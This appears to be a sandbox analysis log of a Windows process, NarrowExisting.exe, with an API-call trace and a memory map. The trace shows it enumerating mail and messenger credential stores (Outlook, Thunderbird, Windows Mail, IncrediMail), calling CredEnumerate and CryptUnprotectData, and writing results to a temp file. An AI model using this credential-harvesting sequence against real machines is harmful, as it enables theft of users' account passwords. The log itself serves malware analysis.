| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting_lng.ini, type = file_attributes |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Profiles, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Thunderbird\Profiles, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird |
|
1 | |
| File | Get Info | filename = C:\Program Files (x86)\Mozilla Thunderbird, type = file_attributes |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe, size = 260 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = AddExportHeaderLine, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = WinPos |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = Columns |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.cfg, section_name = General, key_name = Sort, default_value = 0 |
|
1 | |
| Module | Load | module_name = pstorec.dll, base_address = 0x73eb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\pstorec.dll, function = PStoreCreateInstance, address_out = 0x73eb526c |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x74ee0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x74f15a7f |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x751171c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x750db2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x75117941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x75117381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x75117481 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}, value_name = Username, data = Main Identity, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = POP3 User, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = IMAP User, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = HTTP User, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001, value_name = SMTP User, data = 0, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 User, data = sdjwh@dive.djh, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Server, data = fgerh, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Display Name, data = fvmmeu dufn, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = Email, data = sdjwh@dive.djh, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Server, data = hthr, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP Port, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Port, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Use SPA, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = POP3 Password, data = 0, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = IMAP User, data = 104, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = HTTP User, data = 104, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002, value_name = SMTP User, data = 104, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = POP3 User, data = 104, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = IMAP User, data = 104, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = HTTP User, data = 104, type = REG_NONE |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003, value_name = SMTP User, data = 104, type = REG_NONE |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\IncrediMail\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Group Mail |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\MessengerService |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x751171c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x750db2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x75117941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x75117381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x75117481 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x74ee0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptUnprotectData, address_out = 0x74f15a7f |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Yahoo\Pager |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredReadA, address_out = 0x751171c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredFree, address_out = 0x750db2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredDeleteA, address_out = 0x75117941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateA, address_out = 0x75117381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CredEnumerateW, address_out = 0x75117481 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, type = size |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount, size = 1506, size_out = 1506 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, type = size |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount, size = 670, size_out = 670 |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, type = size |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount, size = 1734, size_out = 1734 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail |
|
1 | |
| File | Create | filename = C:\ProgramData\114E.tmp, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 11 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 12 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 14 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 5 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 2 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 4 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 14 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 7 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 4 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 1 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 0 |
|
1 | |
| File | Write | filename = C:\ProgramData\114E.tmp, size = 2 |
|
1 |
Process #16: narrowexisting.exe
691
0
| Information | Value |
|---|---|
| ID | #16 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" /scomma "C:\ProgramData\114F.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:41, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:51 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2ac |
| Parent PID | 0xa68 (c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
B60
0x
B64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00210fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| rsaenh.dll | 0x00220000 | 0x0025bfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| tzres.dll | 0x00260000 | 0x00260fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000260000 | 0x00260000 | 0x00267fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00276fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00281fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x0045afff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00807fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x01d9ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01da0000 | 0x0206efff | Memory Mapped File | Readable |
|
|
|
- |
